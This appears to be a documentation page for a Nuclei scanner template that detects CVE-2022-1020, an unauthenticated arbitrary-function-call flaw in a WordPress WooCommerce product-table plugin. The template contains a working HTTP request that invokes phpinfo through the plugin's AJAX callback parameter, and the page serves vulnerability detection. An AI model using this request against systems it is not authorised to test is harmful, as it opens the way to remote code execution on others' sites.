WordPress WooCommerce <3.1.2 - Arbitrary Function Call
ID: CVE-2022-1020
Severity: critical
Author: Akincibor
Tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology
Description
Section titled “Description”WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument.
YAML Source
Section titled “YAML Source”id: CVE-2022-1020
info: name: WordPress WooCommerce <3.1.2 - Arbitrary Function Call author: Akincibor severity: critical description: WordPress WooCommerce plugin before 3.1.2 does not have authorisation and CSRF checks in the wpt_admin_update_notice_option AJAX action (available to both unauthenticated and authenticated users), as well as does not validate the callback parameter, allowing unauthenticated attackers to call arbitrary functions with either none or one user controlled argument. impact: | It allows remote code execution on the affected system. remediation: | Update WordPress WooCommerce plugin to version 3.1.2 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/04fe89b3-8ad1-482f-a96d-759d1d3a0dd5 - https://nvd.nist.gov/vuln/detail/CVE-2022-1020 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-1020 cwe-id: CWE-352 epss-score: 0.01578 epss-percentile: 0.8591 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: codeastrology product: woo_product_table framework: wordpress tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,unauth,codeastrology
http: - raw: - | POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
option_key=a&perpose=update&callback=phpinfo
matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and
- type: status status: - 200
extractors: - type: regex group: 1 regex: - '>PHP Version <\/td><td class="v">([0-9.]+)' part: body# digest: 4a0a00473045022100de5f826df9545d04825308480e3767719ee78bd2d9353b0f317061a280b46cfc022076c99986a0d1479c471406a6d0a91d2bdc2f802ca1d1cfeaa97f56a1f8e07a8a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1020.yaml"